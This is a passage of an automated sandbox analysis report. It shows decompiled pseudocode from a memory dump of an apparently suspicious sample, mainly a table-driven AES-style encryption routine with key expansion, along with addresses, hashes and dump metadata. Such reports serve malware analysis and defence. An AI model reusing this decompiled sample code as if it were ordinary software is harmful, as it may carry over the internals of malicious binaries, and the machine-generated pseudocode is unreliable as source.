				signed char _t804;
				signed char _t811;
				signed char _t812;
				signed int* _t819;
				signed char _t820;
				signed char _t827;
				signed char _t828;
				signed char _t835;
				signed char _t842;
				signed char _t843;
				signed int _t851;
				signed int* _t924;
				signed int* _t996;
				signed int* _t997;
				signed int* _t998;
				signed int* _t1010;
				signed int* _t1011;
				signed int* _t1023;
				signed int* _t1024;
				signed int* _t1036;
				signed int* _t1037;
				signed int* _t1049;
				signed int* _t1050;
				signed int* _t1062;
				signed int* _t1063;
				signed int* _t1075;
				signed int* _t1076;
				signed int* _t1088;
				signed int* _t1089;
				signed int* _t1101;
				signed int* _t1102;
				signed int* _t1114;
				signed int* _t1115;
				signed int* _t1127;
				signed int* _t1129;
				signed int* _t1141;
				signed int* _t1142;
				signed int* _t1154;
				signed int* _t1166;
				signed int* _t1167;
				signed int** _t1179;

				_t1179[4] = _t996;
				_t1179[3] = __ebx;
				_t1179[2] = __esi;
				_t1179[1] = __edi;
				_t924 = _t1179[6];
				_t997 = _t1179[8];
				_t851 = _t997[0x3c] & 0x000000ff;
				_t513 =  *_t924 ^  *_t997;
				_t585 = _t924[1] ^ _t997[1];
				_t712 = _t924[2] ^ _t997[2];
				_t739 = _t924[3] ^ _t997[3];
				if(_t851 == 0xa0) {
					L6:
					_t998 =  &(_t997[4]);
					 *_t1179 = _t998;
					asm("rol ebx, 0x10");
					_t515 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
					_t740 = _t739 >> 0x10;
					_t516 = _t515 >> 0x10;
					_t713 = _t712 >> 0x10;
					_t714 = _t998[2] ^  *(0xf4ea240 + (_t712 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t739 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t585 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t516 & 0x000000ff) * 4);
					_t747 = _t998[3] ^  *(0xf4ea240 + (_t739 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t513 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t585 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t713 & 0x000000ff) * 4);
					_t1010 =  *_t1179;
					_t518 =  *(0xf4ea240 + (_t513 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t515 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t740 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t713 & 0x000000ff) * 4) ^  *_t1010;
					_t594 =  *(0xf4eaa40 + (_t740 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t712 & 0x000000ff) * 4) ^  *(0xf4ea240 + (_t515 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t516 & 0x000000ff) * 4) ^ _t1010[1];
					_t1011 =  &(_t1010[4]);
					 *_t1179 = _t1011;
					asm("rol ebx, 0x10");
					_t520 = _t518 & 0xffff0000 | _t594 >> 0x00000010;
					_t748 = _t747 >> 0x10;
					_t521 = _t520 >> 0x10;
					_t715 = _t714 >> 0x10;
					_t716 = _t1011[2] ^  *(0xf4ea240 + (_t714 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t747 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t594 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t521 & 0x000000ff) * 4);
					_t755 = _t1011[3] ^  *(0xf4ea240 + (_t747 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t518 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t594 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t715 & 0x000000ff) * 4);
					_t1023 =  *_t1179;
					_t523 =  *(0xf4ea240 + (_t518 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t520 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t748 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t715 & 0x000000ff) * 4) ^  *_t1023;
					_t603 =  *(0xf4eaa40 + (_t748 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t714 & 0x000000ff) * 4) ^  *(0xf4ea240 + (_t520 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t521 & 0x000000ff) * 4) ^ _t1023[1];
					_t1024 =  &(_t1023[4]);
					 *_t1179 = _t1024;
					asm("rol ebx, 0x10");
					_t525 = _t523 & 0xffff0000 | _t603 >> 0x00000010;
					_t756 = _t755 >> 0x10;
					_t526 = _t525 >> 0x10;
					_t717 = _t716 >> 0x10;
					_t718 = _t1024[2] ^  *(0xf4ea240 + (_t716 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t755 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t603 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t526 & 0x000000ff) * 4);
					_t763 = _t1024[3] ^  *(0xf4ea240 + (_t755 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t523 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t603 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t717 & 0x000000ff) * 4);
					_t1036 =  *_t1179;
					_t528 =  *(0xf4ea240 + (_t523 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t525 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t756 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t717 & 0x000000ff) * 4) ^  *_t1036;
					_t612 =  *(0xf4eaa40 + (_t756 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t716 & 0x000000ff) * 4) ^  *(0xf4ea240 + (_t525 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t526 & 0x000000ff) * 4) ^ _t1036[1];
					_t1037 =  &(_t1036[4]);
					 *_t1179 = _t1037;
					asm("rol ebx, 0x10");
					_t530 = _t528 & 0xffff0000 | _t612 >> 0x00000010;
					_t764 = _t763 >> 0x10;
					_t531 = _t530 >> 0x10;
					_t719 = _t718 >> 0x10;
					_t720 = _t1037[2] ^  *(0xf4ea240 + (_t718 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t763 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t612 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t531 & 0x000000ff) * 4);
					_t771 = _t1037[3] ^  *(0xf4ea240 + (_t763 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t528 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t612 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t719 & 0x000000ff) * 4);
					_t1049 =  *_t1179;
					_t533 =  *(0xf4ea240 + (_t528 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t530 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t764 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t719 & 0x000000ff) * 4) ^  *_t1049;
					_t621 =  *(0xf4eaa40 + (_t764 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t718 & 0x000000ff) * 4) ^  *(0xf4ea240 + (_t530 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t531 & 0x000000ff) * 4) ^ _t1049[1];
					_t1050 =  &(_t1049[4]);
					 *_t1179 = _t1050;
					asm("rol ebx, 0x10");
					_t535 = _t533 & 0xffff0000 | _t621 >> 0x00000010;
					_t772 = _t771 >> 0x10;
					_t536 = _t535 >> 0x10;
					_t721 = _t720 >> 0x10;
					_t722 = _t1050[2] ^  *(0xf4ea240 + (_t720 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t771 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t621 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t536 & 0x000000ff) * 4);
					_t779 = _t1050[3] ^  *(0xf4ea240 + (_t771 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t533 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t621 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t721 & 0x000000ff) * 4);
					_t1062 =  *_t1179;
					_t538 =  *(0xf4ea240 + (_t533 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t535 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t772 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t721 & 0x000000ff) * 4) ^  *_t1062;
					_t630 =  *(0xf4eaa40 + (_t772 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t720 & 0x000000ff) * 4) ^  *(0xf4ea240 + (_t535 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t536 & 0x000000ff) * 4) ^ _t1062[1];
					_t1063 =  &(_t1062[4]);
					 *_t1179 = _t1063;
					asm("rol ebx, 0x10");
					_t540 = _t538 & 0xffff0000 | _t630 >> 0x00000010;
					_t780 = _t779 >> 0x10;
					_t541 = _t540 >> 0x10;
					_t723 = _t722 >> 0x10;
					_t724 = _t1063[2] ^  *(0xf4ea240 + (_t722 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t779 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t630 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t541 & 0x000000ff) * 4);
					_t787 = _t1063[3] ^  *(0xf4ea240 + (_t779 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t538 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t630 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t723 & 0x000000ff) * 4);
					_t1075 =  *_t1179;
					_t543 =  *(0xf4ea240 + (_t538 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t540 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t780 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t723 & 0x000000ff) * 4) ^  *_t1075;
					_t639 =  *(0xf4eaa40 + (_t780 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t722 & 0x000000ff) * 4) ^  *(0xf4ea240 + (_t540 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t541 & 0x000000ff) * 4) ^ _t1075[1];
					_t1076 =  &(_t1075[4]);
					 *_t1179 = _t1076;
					asm("rol ebx, 0x10");
					_t545 = _t543 & 0xffff0000 | _t639 >> 0x00000010;
					_t788 = _t787 >> 0x10;
					_t546 = _t545 >> 0x10;
					_t725 = _t724 >> 0x10;
					_t726 = _t1076[2] ^  *(0xf4ea240 + (_t724 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t787 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t639 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t546 & 0x000000ff) * 4);
					_t795 = _t1076[3] ^  *(0xf4ea240 + (_t787 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t543 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t639 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t725 & 0x000000ff) * 4);
					_t1088 =  *_t1179;
					_t548 =  *(0xf4ea240 + (_t543 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t545 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t788 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t725 & 0x000000ff) * 4) ^  *_t1088;
					_t648 =  *(0xf4eaa40 + (_t788 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t724 & 0x000000ff) * 4) ^  *(0xf4ea240 + (_t545 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t546 & 0x000000ff) * 4) ^ _t1088[1];
					_t1089 =  &(_t1088[4]);
					 *_t1179 = _t1089;
					asm("rol ebx, 0x10");
					_t550 = _t548 & 0xffff0000 | _t648 >> 0x00000010;
					_t796 = _t795 >> 0x10;
					_t551 = _t550 >> 0x10;
					_t727 = _t726 >> 0x10;
					_t728 = _t1089[2] ^  *(0xf4ea240 + (_t726 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t795 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t648 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t551 & 0x000000ff) * 4);
					_t803 = _t1089[3] ^  *(0xf4ea240 + (_t795 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t548 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t648 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t727 & 0x000000ff) * 4);
					_t1101 =  *_t1179;
					_t553 =  *(0xf4ea240 + (_t548 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t550 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t796 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t727 & 0x000000ff) * 4) ^  *_t1101;
					_t657 =  *(0xf4eaa40 + (_t796 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t726 & 0x000000ff) * 4) ^  *(0xf4ea240 + (_t550 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t551 & 0x000000ff) * 4) ^ _t1101[1];
					_t1102 =  &(_t1101[4]);
					 *_t1179 = _t1102;
					asm("rol ebx, 0x10");
					_t555 = _t553 & 0xffff0000 | _t657 >> 0x00000010;
					_t804 = _t803 >> 0x10;
					_t556 = _t555 >> 0x10;
					_t729 = _t728 >> 0x10;
					_t730 = _t1102[2] ^  *(0xf4ea240 + (_t728 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t803 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t657 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t556 & 0x000000ff) * 4);
					_t811 = _t1102[3] ^  *(0xf4ea240 + (_t803 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t553 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t657 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t729 & 0x000000ff) * 4);
					_t1114 =  *_t1179;
					_t558 =  *(0xf4ea240 + (_t553 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t555 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t804 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t729 & 0x000000ff) * 4) ^  *_t1114;
					_t666 =  *(0xf4eaa40 + (_t804 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t728 & 0x000000ff) * 4) ^  *(0xf4ea240 + (_t555 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t556 & 0x000000ff) * 4) ^ _t1114[1];
					_t1115 =  &(_t1114[4]);
					 *_t1179 = _t1115;
					asm("rol ebx, 0x10");
					_t560 = _t558 & 0xffff0000 | _t666 >> 0x00000010;
					_t812 = _t811 >> 0x10;
					_t561 = _t560 >> 0x10;
					_t731 = _t730 >> 0x10;
					_t1127 =  *_t1179;
					_t819 = _t1179[7];
					 *_t819 =  *(0xf4eb240 + (_t558 & 0x000000ff) * 4) ^  *(0xf4eb640 + (_t560 & 0x000000ff) * 4) ^  *(0xf4ebe40 + (_t812 & 0x000000ff) * 4) ^  *(0xf4eba40 + (_t731 & 0x000000ff) * 4) ^  *_t1127;
					_t819[1] =  *(0xf4eba40 + (_t812 & 0x000000ff) * 4) ^  *(0xf4eb640 + (_t730 & 0x000000ff) * 4) ^  *(0xf4eb240 + (_t560 & 0x000000ff) * 4) ^  *(0xf4ebe40 + (_t561 & 0x000000ff) * 4) ^ _t1127[1];
					_t819[2] = _t1115[2] ^  *(0xf4eb240 + (_t730 & 0x000000ff) * 4) ^  *(0xf4eb640 + (_t811 & 0x000000ff) * 4) ^  *(0xf4ebe40 + (_t666 & 0x000000ff) * 4) ^  *(0xf4eba40 + (_t561 & 0x000000ff) * 4);
					_t819[3] = _t1115[3] ^  *(0xf4eb240 + (_t811 & 0x000000ff) * 4) ^  *(0xf4eb640 + (_t558 & 0x000000ff) * 4) ^  *(0xf4eba40 + (_t666 & 0x000000ff) * 4) ^  *(0xf4ebe40 + (_t731 & 0x000000ff) * 4);
					_t564 = 0;
				} else {
					if(_t851 == 0xc0) {
						L5:
						_t1129 =  &(_t997[4]);
						 *_t1179 = _t1129;
						asm("rol ebx, 0x10");
						_t566 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
						_t820 = _t739 >> 0x10;
						_t567 = _t566 >> 0x10;
						_t732 = _t712 >> 0x10;
						_t733 = _t1129[2] ^  *(0xf4ea240 + (_t712 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t739 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t585 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t567 & 0x000000ff) * 4);
						_t827 = _t1129[3] ^  *(0xf4ea240 + (_t739 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t513 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t585 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t732 & 0x000000ff) * 4);
						_t1141 =  *_t1179;
						_t569 =  *(0xf4ea240 + (_t513 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t566 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t820 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t732 & 0x000000ff) * 4) ^  *_t1141;
						_t685 =  *(0xf4eaa40 + (_t820 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t712 & 0x000000ff) * 4) ^  *(0xf4ea240 + (_t566 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t567 & 0x000000ff) * 4) ^ _t1141[1];
						_t1142 =  &(_t1141[4]);
						 *_t1179 = _t1142;
						asm("rol ebx, 0x10");
						_t571 = _t569 & 0xffff0000 | _t685 >> 0x00000010;
						_t828 = _t827 >> 0x10;
						_t572 = _t571 >> 0x10;
						_t734 = _t733 >> 0x10;
						_t712 = _t1142[2] ^  *(0xf4ea240 + (_t733 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t827 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t685 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t572 & 0x000000ff) * 4);
						_t739 = _t1142[3] ^  *(0xf4ea240 + (_t827 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t569 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t685 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t734 & 0x000000ff) * 4);
						_t997 =  *_t1179;
						_t513 =  *(0xf4ea240 + (_t569 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t571 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t828 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t734 & 0x000000ff) * 4) ^  *_t997;
						_t585 =  *(0xf4eaa40 + (_t828 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t733 & 0x000000ff) * 4) ^  *(0xf4ea240 + (_t571 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t572 & 0x000000ff) * 4) ^ _t997[1];
						goto L6;
					} else {
						if(_t851 == 0xe0) {
							_t1154 =  &(_t997[4]);
							 *_t1179 = _t1154;
							asm("rol ebx, 0x10");
							_t575 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
							_t835 = _t739 >> 0x10;
							_t576 = _t575 >> 0x10;
							_t735 = _t712 >> 0x10;
							_t736 = _t1154[2] ^  *(0xf4ea240 + (_t712 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t739 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t585 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t576 & 0x000000ff) * 4);
							_t842 = _t1154[3] ^  *(0xf4ea240 + (_t739 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t513 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t585 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t735 & 0x000000ff) * 4);
							_t1166 =  *_t1179;
							_t578 =  *(0xf4ea240 + (_t513 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t575 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t835 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t735 & 0x000000ff) * 4) ^  *_t1166;
							_t702 =  *(0xf4eaa40 + (_t835 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t712 & 0x000000ff) * 4) ^  *(0xf4ea240 + (_t575 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t576 & 0x000000ff) * 4) ^ _t1166[1];
							_t1167 =  &(_t1166[4]);
							 *_t1179 = _t1167;
							asm("rol ebx, 0x10");
							_t580 = _t578 & 0xffff0000 | _t702 >> 0x00000010;
							_t843 = _t842 >> 0x10;
							_t581 = _t580 >> 0x10;
							_t737 = _t736 >> 0x10;
							_t712 = _t1167[2] ^  *(0xf4ea240 + (_t736 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t842 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t702 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t581 & 0x000000ff) * 4);
							_t739 = _t1167[3] ^  *(0xf4ea240 + (_t842 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t578 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t702 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t737 & 0x000000ff) * 4);
							_t997 =  *_t1179;
							_t513 =  *(0xf4ea240 + (_t578 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t580 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t843 & 0x000000ff) * 4) ^  *(0xf4eaa40 + (_t737 & 0x000000ff) * 4) ^  *_t997;
							_t585 =  *(0xf4eaa40 + (_t843 & 0x000000ff) * 4) ^  *(0xf4ea640 + (_t736 & 0x000000ff) * 4) ^  *(0xf4ea240 + (_t580 & 0x000000ff) * 4) ^  *(0xf4eae40 + (_t581 & 0x000000ff) * 4) ^ _t997[1];
							goto L5;
						} else {
							_t564 = 0xffffffff;
						}
					}
				}
				return _t564;
			}

0x0f4e1023
0x0f4e1027
0x0f4e102b
0x0f4e102f
0x0f4e1033
0x0f4e1042
0x0f4e1046
0x0f4e104d
0x0f4e1050
0x0f4e1053
0x0f4e1056
0x0f4e105f
0x0f4e13c7
0x0f4e13c7
0x0f4e13ca
0x0f4e13d3
0x0f4e1424
0x0f4e1426
0x0f4e145b
0x0f4e145e
0x0f4e148b
0x0f4e148d
0x0f4e148f
0x0f4e1492
0x0f4e1495
0x0f4e1498
0x0f4e149b
0x0f4e14a4
0x0f4e14f5
0x0f4e14f7
0x0f4e152c
0x0f4e152f
0x0f4e155c
0x0f4e155e
0x0f4e1560
0x0f4e1563
0x0f4e1566
0x0f4e1569
0x0f4e156c
0x0f4e1575
0x0f4e15c6
0x0f4e15c8
0x0f4e15fd
0x0f4e1600
0x0f4e162d
0x0f4e162f
0x0f4e1631
0x0f4e1634
0x0f4e1637
0x0f4e163a
0x0f4e163d
0x0f4e1646
0x0f4e1697
0x0f4e1699
0x0f4e16ce
0x0f4e16d1
0x0f4e16fe
0x0f4e1700
0x0f4e1702
0x0f4e1705
0x0f4e1708
0x0f4e170b
0x0f4e170e
0x0f4e1717
0x0f4e1768
0x0f4e176a
0x0f4e179f
0x0f4e17a2
0x0f4e17cf
0x0f4e17d1
0x0f4e17d3
0x0f4e17d6
0x0f4e17d9
0x0f4e17dc
0x0f4e17df
0x0f4e17e8
0x0f4e1839
0x0f4e183b
0x0f4e1870
0x0f4e1873
0x0f4e18a0
0x0f4e18a2
0x0f4e18a4
0x0f4e18a7
0x0f4e18aa
0x0f4e18ad
0x0f4e18b0
0x0f4e18b9
0x0f4e190a
0x0f4e190c
0x0f4e1941
0x0f4e1944
0x0f4e1971
0x0f4e1973
0x0f4e1975
0x0f4e1978
0x0f4e197b
0x0f4e197e
0x0f4e1981
0x0f4e198a
0x0f4e19db
0x0f4e19dd
0x0f4e1a12
0x0f4e1a15
0x0f4e1a42
0x0f4e1a44
0x0f4e1a46
0x0f4e1a49
0x0f4e1a4c
0x0f4e1a4f
0x0f4e1a52
0x0f4e1a5b
0x0f4e1aac
0x0f4e1aae
0x0f4e1ae3
0x0f4e1ae6
0x0f4e1b13
0x0f4e1b15
0x0f4e1b17
0x0f4e1b1a
0x0f4e1b1d
0x0f4e1b20
0x0f4e1b23
0x0f4e1b2c
0x0f4e1b7d
0x0f4e1b7f
0x0f4e1bb4
0x0f4e1bb7
0x0f4e1be4
0x0f4e1bed
0x0f4e1bf1
0x0f4e1bf3
0x0f4e1bf6
0x0f4e1bf9
0x0f4e1bfc
0x0f4e1065
0x0f4e106b
0x0f4e1225
0x0f4e1225
0x0f4e1228
0x0f4e1231
0x0f4e1282
0x0f4e1284
0x0f4e12b9
0x0f4e12bc
0x0f4e12e9
0x0f4e12eb
0x0f4e12ed
0x0f4e12f0
0x0f4e12f3
0x0f4e12f6
0x0f4e12f9
0x0f4e1302
0x0f4e1353
0x0f4e1355
0x0f4e138a
0x0f4e138d
0x0f4e13ba
0x0f4e13bc
0x0f4e13be
0x0f4e13c1
0x0f4e13c4
0x00000000
0x0f4e1071
0x0f4e1077
0x0f4e1083
0x0f4e1086
0x0f4e108f
0x0f4e10e0
0x0f4e10e2
0x0f4e1117
0x0f4e111a
0x0f4e1147
0x0f4e1149
0x0f4e114b
0x0f4e114e
0x0f4e1151
0x0f4e1154
0x0f4e1157
0x0f4e1160
0x0f4e11b1
0x0f4e11b3
0x0f4e11e8
0x0f4e11eb
0x0f4e1218
0x0f4e121a
0x0f4e121c
0x0f4e121f
0x0f4e1222
0x00000000
0x0f4e1079
0x0f4e1079
0x0f4e1079
0x0f4e1077
0x0f4e106b
0x0f4e1c11

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cff77949e326663753d713b98038d78b374781c5fae18ccf00198590d1f62c3c
Instruction ID: 27123890e5038a56412896bbec1f94e71b8f004bc9c727cb102cf6ce7357c932
Opcode Fuzzy Hash: cff77949e326663753d713b98038d78b374781c5fae18ccf00198590d1f62c3c
Instruction Fuzzy Hash: 26622531D043788FDB80DF6EE4840A677A2E745332B4B4526AE805F396D63C7A35AB74

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E8520 Relevance: .4, Instructions: 395
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0F4E8520(signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t274;
				signed int _t284;
				signed int _t287;
				unsigned int _t289;
				intOrPtr _t297;
				signed int _t306;
				signed int _t309;
				unsigned int _t311;
				intOrPtr _t319;
				signed int _t328;
				signed int _t331;
				unsigned int _t333;
				intOrPtr _t341;
				signed int _t350;
				signed int _t353;
				unsigned int _t355;
				intOrPtr _t363;
				signed int _t372;
				signed int _t375;
				unsigned int _t377;
				intOrPtr _t385;
				signed int _t394;
				signed int _t397;
				unsigned int _t399;
				intOrPtr _t407;
				signed int _t416;
				intOrPtr* _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t441;
				intOrPtr _t442;
				signed int _t458;
				intOrPtr _t459;
				signed int _t475;
				intOrPtr _t476;
				signed int _t492;
				intOrPtr _t493;
				signed int _t509;
				intOrPtr _t510;
				signed int _t526;
				intOrPtr _t527;
				signed int _t542;
				signed int _t543;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				signed int _t547;
				signed int _t548;
				signed int _t549;
				signed int _t551;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				intOrPtr _t568;

				_t274 = _a4;
				_t420 = _a8;
				_t428 =  *_t274;
				_v12 = _t428;
				 *_t420 = _t428;
				_t429 =  *((intOrPtr*)(_t274 + 4));
				 *((intOrPtr*)(_t420 + 4)) = _t429;
				_v16 = _t429;
				_t430 =  *((intOrPtr*)(_t274 + 8));
				 *((intOrPtr*)(_t420 + 8)) = _t430;
				_v8 = _t430;
				_t431 =  *((intOrPtr*)(_t274 + 0xc));
				 *((intOrPtr*)(_t420 + 0xc)) = _t431;
				_t543 =  *(_t274 + 0x10);
				 *(_t420 + 0x10) = _t543;
				_t561 =  *(_t274 + 0x14);
				 *(_t420 + 0x14) = _t561;
				_a4 = _t431;
				_t553 =  *(_t274 + 0x18);
				 *(_t420 + 0x18) = _t553;
				_t421 =  *(_t274 + 0x1c);
				 *(_a8 + 0x1c) = _t421;
				_t284 = _v12 ^  *(0xf4eba40 + (_t421 >> 0x18) * 4) ^  *(0xf4eb640 + (_t421 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf4eb240 + (_t421 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf4ebe40 + (_t421 & 0x000000ff) * 4) ^  *0xf4ea200;
				_v12 = _t284;
				 *(_a8 + 0x20) = _t284;
				_t441 = _v16 ^ _t284;
				_v16 = _t441;
				 *(_a8 + 0x24) = _t441;
				_t287 = _v8 ^ _t441;
				_t442 = _a8;
				_v8 = _t287;
				 *(_t442 + 0x28) = _t287;
				_t289 = _a4 ^ _v8;
				 *(_t442 + 0x2c) = _t289;
				_a4 = _t289;
				_t297 = _a8;
